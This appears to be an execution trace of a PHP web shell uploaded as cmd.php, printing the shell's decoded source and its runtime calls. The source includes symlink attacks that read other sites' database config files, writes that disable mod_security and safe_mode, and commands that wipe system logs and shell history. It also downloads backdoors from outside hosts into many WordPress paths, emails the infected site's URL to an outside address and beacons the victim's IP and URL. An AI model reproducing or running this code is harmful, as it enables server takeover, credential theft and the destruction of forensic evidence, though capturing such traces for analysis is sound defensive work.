$l=$l?0:1;\r\n } echo "</table>";\r\n } echo "</center>";\r\n } if(isset($_POST[\'p1\']) && $_POST[\'p1\']==\'whole\') { echo "<center>";\r\n @mkdir(\'sym\',0777);\r\n $hdt = "Options all \\n DirectoryIndex Sux.html \\n AddType 
text/plain .php \\n AddHandler server-parsed .php \\n AddType text/plain .html \\n AddHandler txt .html \\n Require None \\n Satisfy Any";\r\n $hfp =@fopen (\'sym/.htaccess\',\'w\');\r\n fwrite($hfp ,$hdt);\r\n if(function_exists(\'symlink\')) { @symlink(\'/\',\'sym/root\');\r\n } $d0mains = @file(\'/etc/named.conf\');\r\n if(!$d0mains) { echo "<pre class=ml1 style=\'margin-top:5px\'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";\r\n } else { echo "<table align=\'center\' width=\'40%\' class=\'main\'><tr><th> Count </th><th> Domains </th><th> User </th><th> Symlink </th></tr>";\r\n $count=1;\r\n $mck = array();\r\n foreach($d0mains as $d0main){ if(@eregi(\'zone\',$d0main)){ preg_match_all(\'#zone "(.*)"#\',$d0main,$domain);\r\n flush();\r\n if(strlen(trim($domain[1][0])) >2){ $mck[] = $domain[1][0];\r\n } } } $mck = array_unique($mck);\r\n $l=0;\r\n foreach($mck as $d) { $user = posix_getpwuid(@fileowner(\'/etc/valiases/\'.$d));\r\n $ddt = $user[\'name\'];\r\n $ddt = $d;\r\n if(@eregi("\\.ir",$d) or @eregi("\\.il",$d)) { $ddt = "<div style=\' color: #FF0000 ;\r\n text-shadow: 0px 0px 1px red;\r\n \'>".$d.\'</div>\';\r\n } echo "<tr".($l?\' class=l1\':\'\')."><td>".$count++."</td><td><a target=\'_blank\' href=http://".$d.\'/>\'.$ddt.\' </a></td><td>\'.$user[\'name\']."</td><td><a href=\'sym/root/home/".$user[\'name\']."/public_html\' target=\'_blank\'>symlink </a></td></tr>";\r\n flush();\r\n $l=$l?0:1;\r\n } echo \'</table>\';\r\n } echo "</center>";\r\n } if(isset($_POST[\'p1\']) && $_POST[\'p1\']==\'config\') { echo "<center>";\r\n @mkdir(\'sym\',0777);\r\n $hdt = "Options all \\n DirectoryIndex Sux.html \\n AddType text/plain .php \\n AddHandler server-parsed .php \\n AddType text/plain .html \\n AddHandler txt .html \\n Require None \\n Satisfy Any";\r\n $hfp = @fopen (\'sym/.htaccess\',\'w\');\r\n @fwrite($hfp ,$hdt);\r\n if(function_exists(\'symlink\')) { @symlink(\'/\',\'sym/root\');\r\n } $d0mains = @file(\'/etc/named.conf\');\r\n 
if(!$d0mains) { echo "<pre class=ml1 style=\'margin-top:5px\'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";\r\n } else { echo "<table align=\'center\' width=\'40%\' class=\'main\' ><tr><th> Count </th><th> Domains </th><th> Script </th></tr>";\r\n $count = 1;\r\n $l=0;\r\n foreach($d0mains as $d0main){ if(@eregi(\'zone\',$d0main)){ preg_match_all(\'#zone "(.*)"#\',$d0main,$domain);\r\n flush();\r\n if(strlen(trim($domain[1][0]))>2){ $user = posix_getpwuid(@fileowner(\'/etc/valiases/\'.$domain[1][0]));\r\n $c1 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/wp-config.php\';\r\n $ch01 = get_headers($c1);\r\n $cf01 = $ch01[0];\r\n $c2 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/blog/wp-config.php\';\r\n $ch02 = get_headers($c2);\r\n $cf02 = $ch02[0];\r\n $c3 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/configuration.php\';\r\n $ch03 = get_headers($c3);\r\n $cf03 = $ch03[0];\r\n $c4 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/joomla/configuration.php\';\r\n $ch04 = get_headers($c4);\r\n $cf04 = $ch04[0];\r\n $c5 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/includes/config.php\';\r\n $ch05 = get_headers($c5);\r\n $cf05 = $ch05[0];\r\n $c6 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/vb/includes/config.php\';\r\n $ch06 = get_headers($c6);\r\n $cf06 = $ch06[0];\r\n $c7 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/forum/includes/config.php\';\r\n $ch07 = get_headers($c7);\r\n $cf07 = $ch07[0];\r\n $c8 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'public_html/clients/configuration.php\';\r\n $ch08 = get_headers($c8);\r\n $cf08 = $ch08[0];\r\n $c9 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/support/configuration.php\';\r\n $ch09 = get_headers($c9);\r\n $cf09 = $ch09[0];\r\n $c10 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/client/configuration.php\';\r\n $ch10 = get_headers($c10);\r\n $cf10 = $ch10[0];\r\n $c11 = 
$burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/submitticket.php\';\r\n $ch11 = get_headers($c11);\r\n $cf11 = $ch11[0];\r\n $c12 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/client/configuration.php\';\r\n $ch12 = get_headers($c12);\r\n $cf12 = $ch12[0];\r\n $c13 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/includes/configure.php\';\r\n $ch13 = get_headers($c13);\r\n $cf13 = $ch13[0];\r\n $c14 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/include/app_config.php\';\r\n $ch14 = get_headers($c14);\r\n $cf14 = $ch14[0];\r\n $c15 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/sites/default/settings.php\';\r\n $ch15 = get_headers($c15);\r\n $cf15 = $ch15[0];\r\n $out = \'&nbsp;\r\n\';\r\n if(strpos($cf01,\'200\') == true) { $out = "<a href=\'".$c1."\' target=\'_blank\'>Wordpress</a>";\r\n } elseif(strpos($cf02,\'200\') == true) { $out = "<a href=\'".$c2."\' target=\'_blank\'>Wordpress</a>";\r\n } elseif(strpos($cf03,\'200\') == true && strpos($cf11,\'200\') == true) { $out = " <a href=\'".$c11."\' target=\'_blank\'>WHMCS</a>";\r\n } elseif(strpos($cf09,\'200\') == true) { $out = " <a href=\'".$c9."\' target=\'_blank\'>WHMCS</a>";\r\n } elseif(strpos($cf10,\'200\') == true) { $out = " <a href=\'".$c10."\' target=\'_blank\'>WHMCS</a>";\r\n } elseif(strpos($cf03,\'200\') == true) { $out = " <a href=\'".$c3."\' target=\'_blank\'>Joomla</a>";\r\n } elseif(strpos($cf04,\'200\') == true) { $out = " <a href=\'".$c4."\' target=\'_blank\'>Joomla</a>";\r\n } elseif(strpos($cf05,\'200\') == true) { $out = " <a href=\'".$c5."\' target=\'_blank\'>vBulletin</a>";\r\n } elseif(strpos($cf06,\'200\') == true) { $out = " <a href=\'".$c6."\' target=\'_blank\'>vBulletin</a>";\r\n } elseif(strpos($cf07,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>vBulletin</a>";\r\n } elseif(strpos($cf08,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Client Area</a>";\r\n } elseif(strpos($cf12,\'200\') == 
true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Client Area</a>";\r\n } elseif(strpos($cf13,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>osCommerce/Zen Cart</a>";\r\n } elseif(strpos($cf14,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Magento</a>";\r\n } elseif(strpos($cf15,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Drupal</a>";\r\n } else { continue;\r\n } echo \'<tr\'.($l?\' class=l1\':\'\').\'><td>\'.$count++.\'</td><td><a href=http://www.\'.$domain[1][0].\'/>\'.$domain[1][0].\'</a></td><td>\'.$user[\'name\'].\'</td><td>\'.$out.\'</td></tr>\';\r\n flush();\r\n $l=$l?0:1;\r\n } } } echo "</table>";\r\n } echo "</center>";\r\n } echo "</div>";\r\n printFooter();\r\n } function actionSafeMode() { printHeader();\r\n echo \'<h1>Safe Mode</h1>\';\r\n echo \'<div class="content">\';\r\n echo "<div class=header><center><h3><span>| SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS |</span></h3>Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh ] files create in following dir<br>| ".$GLOBALS[\'cwd\']." 
|<br><br />";\r\n echo \'<a href=# onclick="g(null,null,\\\'php.ini\\\',null)">| PHP.INI | </a><a href=# onclick="g(null,null,null,\\\'ini\\\')">| .htaccess(Mod) | </a><a href=# onclick="g(null,null,null,null,\\\'sh\\\')">| .htaccess(perl) | </a></center>\';\r\n if(!empty($_POST[\'p2\']) && isset($_POST[\'p2\'])) { $fil=fopen($GLOBALS[\'cwd\'].".htaccess","w");\r\n fwrite($fil,\'<IfModule mod_security.c>\r\n Sec------Engine Off\r\n Sec------ScanPOST Off\r\n </IfModule>\');\r\n fclose($fil);\r\n } if(!empty($_POST[\'p1\'])&& isset($_POST[\'p1\'])) { $fil=fopen($GLOBALS[\'cwd\']."php.ini","w");\r\n fwrite($fil,\'safe_mode=OFF\r\n disable_functions=NONE\');\r\n fclose($fil);\r\n } if(!empty($_POST[\'p3\']) && isset($_POST[\'p3\'])) { $fil=fopen($GLOBALS[\'cwd\'].".htaccess","w");\r\n fwrite($fil,\'Options FollowSymLinks MultiViews Indexes ExecCGI\r\n AddType application/x-httpd-cgi .sh\r\n AddHandler cgi-script .pl\r\n AddHandler cgi-script .pl\');\r\n fclose($fil);\r\n } echo "<br><br /><br /></div>";\r\n echo \'</div>\';\r\n printFooter();\r\n} function actionSQLBUDDY(){ printHeader();\r\n if(!file_exists(\'yazilimlar/sqlbuddy/index.php\')){ $dizin = \'https://byr00t.co/vb/sqlbuddy.zip\';\r\n function dosya_indir($link,$name=null) { $link_info = pathinfo($link);\r\n $uzanti = strtolower($link_info[\'extension\']);\r\n $file = ($name) ? 
$name.\'.\'.$uzanti : $link_info[\'basename\'];\r\n $curl = curl_init($link);\r\n $fopen = fopen($file,\'w\');\r\n curl_setopt($curl, CURLOPT_HEADER,0);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt($curl, CURLOPT_FILE, $fopen);\r\n curl_exec($curl);\r\n curl_close($curl);\r\n fclose($fopen);\r\n } dosya_indir($dizin, "sqlbuddy");\r\n $zip = new ZipArchive();\r\n $file = \'sqlbuddy.zip\';\r\n $zip->open($file);\r\n $cikar = $zip->extractTo(\'yazilimlar/\');\r\n if(file_exists(\'sqlbuddy.zip\')){ @unlink(\'sqlbuddy.zip\');\r\n } if($cikar){ echo "<iframe src=yazilimlar/sqlbuddy/index.php width=100% height=100% frameborder=0></iframe> ";\r\n } else{ echo \'<div class="alert alert-danger"><strong>Hata!</strong> Dosya indirilirken kritik bir hata oluştu.</div>\';\r\n } } elseif(file_exists(\'yazilimlar/sqlbuddy/index.php\')){ echo "<iframe src=yazilimlar/sqlbuddy/index.php width=100% height=100% frameborder=0></iframe> ";\r\n } printFooter();\r\n } function actionDeleteLOG(){ printHeader();\r\n echo \'<h1>Delete Logs</h1>\';\r\n function cmdExe($in) { $out = \'\';\r\n if (function_exists(\'passthru\')) { ob_start();\r\n @passthru($in);\r\n $out = ob_get_clean();\r\n } else if (function_exists(\'exec\')) { @exec($in,$out);\r\n $out = @join("\\n",$out);\r\n } elseif (function_exists(\'system\')) { ob_start();\r\n @system($in);\r\n $out = ob_get_clean();\r\n } elseif (function_exists(\'shell_exec\')) { $out = shell_exec($in);\r\n } elseif (is_resource($f = @popen($in,"r"))) { $out = "";\r\n while(!@feof($f)) $out .= fread($f,1024);\r\n pclose($f);\r\n } return $out;\r\n } cmdExe("rm -rf /tmp/logs");\r\n cmdExe("rm -rf /root/.ksh_history");\r\n cmdExe("rm -rf /root/.bash_history");\r\n cmdExe("rm -rf /root/.bash_logout");\r\n cmdExe("rm -rf /usr/local/apache/logs");\r\n cmdExe("rm -rf /usr/local/apache/log");\r\n cmdExe("rm -rf /var/apache/logs");\r\n cmdExe("rm -rf 
/var/apache/log");\r\n cmdExe("rm -rf /var/run/utmp");\r\n cmdExe("rm -rf /var/logs");\r\n cmdExe("rm -rf /var/log");\r\n cmdExe("rm -rf /var/adm");\r\n cmdExe("rm -rf /etc/wtmp");\r\n cmdExe("rm -rf /etc/utmp");\r\n cmdExe("rm -rf $HISTFILE");\r\n cmdExe("rm -rf /var/log/lastlog");\r\n cmdExe("rm -rf /var/log/wtmp");\r\n echo \'<div style="padding:5px;\r\n">\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /tmp/logs <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /root/.ksh_history <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /root/.bash_history <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /usr/local/apache/logs <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /usr/local/apache/log <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/apache/logs <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/apache/log <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/run/utmp <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/adm <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /etc/wtmp <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> $HISTFILE<br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/log/lastlog <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/log/wtmp <br>\r\n </div>\';\r\n printFooter();\r\n } function actionPython(){ printHeader();\r\n if(!is_dir(\'python\')){ mkdir(\'python\', 0755);\r\n } chdir(\'python\');\r\n$kokdosya = ".htaccess";\r\n $dosya_adi = "$kokdosya";\r\n $dosya = fopen ($dosya_adi , \'w\') or die ("Dosya a&#231;\r\n&#305;\r\nlamad&#305;\r\n!");\r\n $metin = "AddHandler cgi-script .r00t";\r\n fwrite ( $dosya , $metin ) ;\r\n fclose ($dosya);\r\n $pythonp = 
\'[base64-encoded payload removed]\';\r\n $file = fopen("python.r00t" ,"w+");\r\n $write = fwrite ($file ,base64_decode($pythonp));\r\n fclose($file);\r\n chmod("python.r00t",0755);\r\n echo "<iframe src=python/python.r00t width=100% height=100% frameborder=0></iframe> ";\r\n printFooter();\r\n } if( empty($_POST[\'a\']) ) if(isset($default_action) && function_exists(\'action\' . $default_action)) $_POST[\'a\'] = $default_action;\r\n else $_POST[\'a\'] = \'SecInfo\';\r\n if( !empty($_POST[\'a\']) && function_exists(\'action\' . $_POST[\'a\']) ) call_user_func(\'action\' . 
$_POST[\'a\']);\r\n \r\n?>\r\n<?php if($_POST[\'query\']){ $veriyfy = stripslashes(stripslashes($_POST[\'query\']));\r\n $data = "data.txt";\r\n @touch ("data.txt");\r\n $ver = @fopen ($data , \'w\');\r\n @fwrite ( $ver , $veriyfy ) ;\r\n @fclose ($ver);\r\n }else{ $datas=@fopen("data.txt",\'r\');\r\n $i=0;\r\n while ($i <= 5) { $i++;\r\n $blue=@fgets($datas,1024);\r\n echo $blue;\r\n } } $datasi=@fopen("js/js.php",\'r\');\r\n if($datasi){ }else{ @mkdir("js");\r\n $dos = file_get_contents("http://phpshell.in/txt/lamer.txt");\r\n $data = "js/js.php";\r\n @touch ("js/js.php");\r\n $ver = @fopen ($data , \'w\');\r\n @fwrite ( $ver , $dos ) ;\r\n @fclose ($ver);\r\n $yol = "http://".$_SERVER[\'HTTP_HOST\']."".$_SERVER[\'REQUEST_URI\']."";\r\n $y = \'<h1>Sender Yazdirildi.<br/> SITE YOL : \'.$yol.\'<br/>Sender Yolu : js/js.php</h1>\';\r\n $header .= "From: SheLL Boot <suppor@nic.org>\\n";\r\n $header .= "Content-Type: text/html;\r\n charset=utf-8\\n";\r\n @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header);\r\n @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header);\r\n } \r\n?>\r\n<?php\r\nfunction http_get($url){\r\n$im = curl_init($url);\r\ncurl_setopt($im, CURLOPT_RETURNTRANSFER, 1);\r\ncurl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);\r\ncurl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);\r\ncurl_setopt($im, CURLOPT_HEADER, 0);\r\nreturn curl_exec($im);\r\ncurl_close($im);\r\n}\r\n$check1 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-includes/js/js.php" ;\r\n$text1 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1 = fopen($check1, \'w\');\r\nfwrite($open1, $text1);\r\nfclose($open1);\r\nif(file_exists($check1)){\r\n}\r\n$check12 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-includes/index.php" ;\r\n$text12 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12 = fopen($check12, \'w\');\r\nfwrite($open12, $text12);\r\nfclose($open12);\r\nif(file_exists($check12)){\r\n}\r\n$check123 = $_SERVER[\'DOCUMENT_ROOT\'] . 
"/wp-admin/images/images.php" ;\r\n$text123 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123 = fopen($check123, \'w\');\r\nfwrite($open123, $text123);\r\nfclose($open123);\r\nif(file_exists($check123)){\r\n}\r\n$check12345 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/css/css.php" ;\r\n$text12345 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345 = fopen($check12345, \'w\');\r\nfwrite($open12345, $text12345);\r\nfclose($open12345);\r\nif(file_exists($check12345)){\r\n}\r\n$check123456 = $_SERVER[\'DOCUMENT_ROOT\'] . "/adm.php" ;\r\n$text123456 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123456 = fopen($check123456, \'w\');\r\nfwrite($open123456, $text123456);\r\nfclose($open123456);\r\nif(file_exists($check123456)){\r\n}\r\n$check1234567 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/css.php" ;\r\n$text1234567 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567 = fopen($check1234567, \'w\');\r\nfwrite($open1234567, $text1234567);\r\nfclose($open1234567);\r\nif(file_exists($check1234567)){\r\n}\r\n$check12345678 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/install.php" ;\r\n$text12345678 = http_get(\'http://byr00t.co/txt/tools.txt\');\r\n$open12345678 = fopen($check12345678, \'w\');\r\nfwrite($open12345678, $text12345678);\r\nfclose($open12345678);\r\nif(file_exists($check12345678)){\r\n}\r\n$check123456789 = $_SERVER[\'DOCUMENT_ROOT\'] . "/cgi-bin/css.php" ;\r\n$text123456789 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123456789 = fopen($check123456789, \'w\');\r\nfwrite($open123456789, $text123456789);\r\nfclose($open123456789);\r\nif(file_exists($check123456)){\r\n}\r\n$check12345678910 = $_SERVER[\'DOCUMENT_ROOT\'] . 
"/js/css.php" ;\r\n$text12345678910 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345678910 = fopen($check12345678910, \'w\');\r\nfwrite($open12345678910, $text12345678910);\r\nfclose($open12345678910);\r\nif(file_exists($check123456)){\r\n}\r\n$check1234567891011 = $_SERVER[\'DOCUMENT_ROOT\'] . "/css/css.php" ;\r\n$text1234567891011 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567891011 = fopen($check1234567891011, \'w\');\r\nfwrite($open123, $text1234567891011);\r\nfclose($open1234567891011);\r\nif(file_exists($check1234567891011)){\r\n}\r\n$check123456789101112 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-login.php" ;\r\n$text123456789101112 = http_get(\'http://phpshell.in/txt/seo.txt\');\r\n$open123456789101112= fopen($check123456789101112, \'w\');\r\nfwrite($open123456789101112, $text123456789101112);\r\nfclose($open123456789101112);\r\nif(file_exists($check123456789101112)){\r\n}\r\n$check12345678910111213 = $_SERVER[\'DOCUMENT_ROOT\'] . "/images/css.php" ;\r\n$textk12345678910111213 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$openk12345678910111213 = fopen($checkk12345678910111213, \'w\');\r\nfwrite($openk12345678910111213, $textk12345678910111213);\r\nfclose($openk12345678910111213);\r\nif(file_exists($checkk12345678910111213)){\r\n}\r\n$check1234567891011121314 = $_SERVER[\'DOCUMENT_ROOT\'] . "/img/css.php" ;\r\n$text1234567891011121314 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567891011121314 = fopen($checkk1234567891011121314, \'w\');\r\nfwrite($open1234567891011121314, $text1234567891011121314);\r\nfclose($open1234567891011121314);\r\nif(file_exists($check1234567891011121314)){\r\n}\r\n$check123456789101112131415 = $_SERVER[\'DOCUMENT_ROOT\'] . 
"/modules/css.php" ;\r\n$text123456789101112131415 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123456789101112131415 = fopen($check123456789101112131415, \'w\');\r\nfwrite($open123456789101112131415, $text123456789101112131415);\r\nfclose($open123456789101112131415);\r\nif(file_exists($check123456789101112131415)){\r\n}\r\n$check12345678910111213141516 = $_SERVER[\'DOCUMENT_ROOT\'] . "/includes/css.php" ;\r\n$text12345678910111213141516 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345678910111213141516 = fopen($check12345678910111213141516, \'w\');\r\nfwrite($open12345678910111213141516, $text12345678910111213141516);\r\nfclose($open12345678910111213141516);\r\nif(file_exists($check12345678910111213141516)){\r\n}\r\n$check1234567891011121314151617 = $_SERVER[\'DOCUMENT_ROOT\'] . "/phpinfo.php" ;\r\n$text1234567891011121314151617 = http_get(\'http://phpshell.in/txt/phpinfo.txt\');\r\n$open1234567891011121314151617 = fopen($check1234567891011121314151617, \'w\');\r\nfwrite($open1234567891011121314151617, $text1234567891011121314151617);\r\nfclose($open1234567891011121314151617);\r\nif(file_exists($check1234567891011121314151617)){\r\n}\r\n$check123456789101112131415161718 = $_SERVER[\'DOCUMENT_ROOT\'] . "/.well-known/css.php" ;\r\n$textk123456789101112131415161718 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$openk123456789101112131415161718 = fopen($checkk123456789101112131415161718, \'w\');\r\nfwrite($openk123456789101112131415161718, $textk123456789101112131415161718);\r\nfclose($openk123456789101112131415161718);\r\nif(file_exists($checkk123456789101112131415161718)){\r\n}\r\n$checkk12345678910111213141516171819 = $_SERVER[\'DOCUMENT_ROOT\'] . 
"/sites/css.php" ;\r\n$text12345678910111213141516171819 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345678910111213141516171819 = fopen($check12345678910111213141516171819, \'w\');\r\nfwrite($open12345678910111213141516171819, $text12345678910111213141516171819);\r\nfclose($open12345678910111213141516171819);\r\nif(file_exists($check12345678910111213141516171819)){\r\n}\r\n$check1234567891011121314151617181920 = $_SERVER[\'DOCUMENT_ROOT\'] . "/tmp/css.php" ;\r\n$text1234567891011121314151617181920 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567891011121314151617181920 = fopen($check1234567891011121314151617181920, \'w\');\r\nfwrite($open1234567891011121314151617181920, $text1234567891011121314151617181920);\r\nfclose($open1234567891011121314151617181920);\r\nif(file_exists($check1234567891011121314151617181920)){\r\n}\r\n?>\r\n'	/var/www/html/uploads/cmd.php(4) : eval()'d code	1	0
4	13	0	0.007871	1143752	base64_decode	0		/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	16	1	'aHR0cDovL2J5cjAwdC5jby9sLQ=='
4	13	1	0.007902	1143840
4	13	R			'http://byr00t.co/l-'
4	14	0	0.007928	1143808	GetIP	1		/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	16	0
5	15	0	0.007950	1143808	getenv	0		/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	3	1	'HTTP_CLIENT_IP'
5	15	1	0.007975	1143840
5	15	R			FALSE
5	16	0	0.007998	1143808	getenv	0		/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	5	1	'HTTP_X_FORWARDED_FOR'
5	16	1	0.008023	1143840
5	16	R			FALSE
5	17	0	0.008045	1143808	getenv	0		/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	12	1	'REMOTE_ADDR'
5	17	1	0.008069	1143880
5	17	R			'127.0.0.1'
4		A						/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	12	$ip = '127.0.0.1'
4	14	1	0.008112	1143848
4	14	R			'127.0.0.1'
4	18	0	0.008136	1143872	base64_encode	0		/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	16	1	'http://localhost/uploads/cmd.php'
4	18	1	0.008158	1143984
4	18	R			'aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL2NtZC5waHA='
3		A						/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	16	$x = 'http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL2NtZC5waHA='
4	19	0	0.008208	1143864	function_exists	0		/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	17	1	'curl_init'
4	19	1	0.008229	1143904
4	19	R			TRUE
4	20	0	0.008251	1143864	curl_init	0		/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	19	0
4	20	1	0.008283	1144776
4	20	R			resource(3) of type (curl)
3		A						/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	19	$ch = resource(3) of type (curl)
4	21	0	0.008326	1144776	curl_setopt	0		/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	19	3	resource(3) of type (curl)	10002	'http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL2NtZC5waHA='
4	21	1	0.008357	1144872
4	21	R			TRUE
4	22	0	0.008378	1144776	curl_setopt	0		/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	19	3	resource(3) of type (curl)	19913	TRUE
4	22	1	0.008401	1144872
4	22	R			TRUE
4	23	0	0.008421	1144776	curl_exec	0		/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	19	1	resource(3) of type (curl)
4	23	1	0.055755	1144808
4	23	R			''
3		A						/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	19	$gitt = ''
4	24	0	0.055821	1144776	curl_close	0		/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	19	1	resource(3) of type (curl)
4	24	1	0.055893	1143920
4	24	R			NULL
4	25	0	0.055915	1143888	file_get_contents	0		/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	21	1	'http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL2NtZC5waHA='
4	25	1	1.028402	1147584
4	25	R			''
3		A						/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	21	$gitt = ''
3		A						/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	26	$auth_pass = 'a6d13df8a46cf713e5cda6a6c0d043bf'
3		A						/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	27	$color = '#00ff66'
3		A						/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	28	$default_action = 'FilesMan'
4	26	0	1.028518	1147544	define	0		/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	29	2	'SELF_PATH'	'/var/www/html/uploads/cmd.php(4) : eval()\'d code(1) : eval()\'d code'
4	26	1	1.028566	1147648
4	26	R			TRUE
4	27	0	1.028582	1147576	strpos	0		/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	30	2	'python-requests/2.25.1'	'Google'
4	27	1	1.028624	1147648
4	27	R			FALSE
4	28	0	1.028648	1147576	session_start	0		/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	32	0
4	28	1	1.028717	1148328
4	28	R			TRUE
4	29	0	1.028732	1148328	error_reporting	0		/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	33	1	0
4	29	1	1.028746	1148368
4	29	R			0
4	30	0	1.028759	1148328	ini_set	0		/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	34	2	'error_log'	NULL
4	30	1	1.028775	1148400
4	30	R			''
4	31	0	1.028787	1148328	ini_set	0		/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	35	2	'display_errors'	0
4	31	1	1.028802	1148400
4	31	R			''
4	32	0	1.028814	1148328	ini_set	0		/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	36	2	'log_errors'	0
4	32	1	1.028828	1148400
4	32	R			'1'
4	33	0	1.028840	1148328	ini_set	0		/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	37	2	'max_execution_time'	0
4	33	1	1.028856	1148432
4	33	R			'30'
4	34	0	1.028869	1148328	set_time_limit	0		/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	38	1	0
4	34	1	1.028883	1148392
4	34	R			FALSE
3	12	1	1.028905	1149824
2	7	1	1.028922	1062800
1	3	1	1.028929	1061224
1	35	0	1.028937	1061256	Error->__toString	0		Unknown	0	0
2	36	0	1.028949	1061336	Error->getTraceAsString	0		Unknown	0	0
2	36	1	1.028961	1061592
